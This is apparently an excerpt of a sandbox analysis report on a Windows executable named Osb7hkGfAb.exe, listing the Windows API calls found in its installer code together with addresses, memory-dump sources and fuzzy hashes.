                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  APIs
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                    • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                    • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                                    • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                    • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2972824698-0
                                                                  • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                  • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                  • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                  • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                  • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                  • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                  • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                  • GetClientRect.USER32(?,?), ref: 00405407
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                  • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                  • ShowWindow.USER32(00000000), ref: 00405554
                                                                  • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                  • ShowWindow.USER32(00000008), ref: 004055A1
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                  • CreatePopupMenu.USER32 ref: 004055E6
                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                                  • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                  • OpenClipboard.USER32(00000000), ref: 00405680
                                                                  • EmptyClipboard.USER32 ref: 00405686
                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                  • CloseClipboard.USER32 ref: 004056D7
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID:
                                                                  • API String ID: 590372296-0
                                                                  • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                  • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                  • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                  • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                  • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                  • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                    • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                    • Part of subcall function 004063D2: CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                  • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                    • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                    • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                    • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A$C:\Users\user\tranchet$Call
                                                                  • API String ID: 2624150263-822576286
                                                                  • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                  • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                  • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                  • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                  APIs
                                                                    • Part of subcall function 6FF81215: GlobalAlloc.KERNEL32(00000040,6FF81233,?,6FF812CF,-6FF8404B,6FF811AB,-000000A0), ref: 6FF8121D
                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6FF81BC4
                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6FF81C0C
                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6FF81C16
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF81C29
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF81D09
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF81D0E
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF81D13
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF81EFA
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 6FF82098
                                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6FF82114
                                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6FF82125
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FF8217E
                                                                  • lstrlenA.KERNEL32(00000408), ref: 6FF82198
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                  • String ID:
                                                                  • API String ID: 245916457-0
                                                                  • Opcode ID: 1e965431c806b36e34d6afa4413d180d302e7de13ab9f1e0bcad0bbed0f36f7f
                                                                  • Instruction ID: 48bc245fc3b2ede5434c61228294c2d6ce31ed09e411ba076d36c679ec9b608b
                                                                  • Opcode Fuzzy Hash: 1e965431c806b36e34d6afa4413d180d302e7de13ab9f1e0bcad0bbed0f36f7f
                                                                  • Instruction Fuzzy Hash: FA227A7294464ADEDB108FB8C9807EEBBF4FF06315F20472AD1B6E6290DB756681CB50
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                  • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                  • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                  • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                  • ShowWindow.USER32(00000000), ref: 0040517B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 2564846305-813528018
                                                                  • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                  • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                  • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                  • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                  • ShowWindow.USER32(?), ref: 00403D00
                                                                  • DestroyWindow.USER32 ref: 00403D14
                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                  • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                  • EnableWindow.USER32(?,?), ref: 00403F68
                                                                  • EnableWindow.USER32(?,?), ref: 00403F83
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                  • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                  • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                  • String ID:
                                                                  • API String ID: 184305955-0
                                                                  • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                  • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                  • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                  • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                  • GetSysColor.USER32(?), ref: 004043B4
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                  • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                  • SendMessageA.USER32(00000000), ref: 0040445E
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                  • SetCursor.USER32(00000000), ref: 004044E1
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                  • SetCursor.USER32(00000000), ref: 004044FA
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: Call$N
                                                                  • API String ID: 3103080414-3438112850
                                                                  • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                  • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                  • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                  • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,datastrrelsers Setup,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F$datastrrelsers Setup
                                                                  • API String ID: 941294808-580256567
                                                                  • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                  • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                  • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                  • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                  • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                    • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                  • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                  • wsprintfA.USER32 ref: 00405DDB
                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                  • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %s=%s$[Rename]
                                                                  • API String ID: 2171350718-1727408572
                                                                  • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                  • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                  • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                  • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                  • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                  • CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 0040640E
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                  • *?|<>/":, xrefs: 0040641A
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-3358009494
                                                                  • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                  • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                  • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                  • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                  • GetSysColor.USER32(00000000), ref: 0040423D
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                  • SetBkMode.GDI32(?,?), ref: 00404255
                                                                  • GetSysColor.USER32(?), ref: 00404268
                                                                  • SetBkColor.GDI32(?,?), ref: 00404278
                                                                  • DeleteObject.GDI32(?), ref: 00404292
                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  APIs
                                                                    • Part of subcall function 6FF81215: GlobalAlloc.KERNEL32(00000040,6FF81233,?,6FF812CF,-6FF8404B,6FF811AB,-000000A0), ref: 6FF8121D
                                                                  • GlobalFree.KERNEL32(?), ref: 6FF825DE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF82618
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
